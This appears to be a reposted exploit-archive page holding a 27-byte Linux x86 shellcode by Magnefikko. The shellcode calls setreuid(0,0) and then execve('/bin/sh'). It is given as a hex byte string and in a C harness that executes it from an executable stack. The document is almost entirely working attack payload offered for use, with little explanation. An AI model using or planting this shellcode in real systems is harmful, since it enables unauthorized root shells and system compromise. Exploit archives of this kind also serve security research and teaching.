linux/x86 setreuid(0, 0) & execve("/bin/sh") shellcode 27 bytes
|
来源:magnefikko@gmail.com 作者:Magnefikko 发布时间:2010-04-23
|
|
=============================================================== linux/x86 setreuid(0, 0) & execve("/bin/sh") shellcode 27 bytes ===============================================================
#include <stdio.h> #include <string.h>
/* by Magnefikko 22.04.2010 magnefikko@gmail.com promhyl.oz.pl Subgroup: #PRekambr Name: 27 bytes setreuid(0, 0) & execve("/bin/sh"); shellcode Platform: Linux x86 setreuid(0, 0); execve("/bin/sh", 0, 0);
gcc -Wl,-z,execstack filename.c
shellcode:
\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80
*/
int main(){ char shell[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80"; printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell) = %d\n", strlen(shell)); (*(void (*)()) shell)(); }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|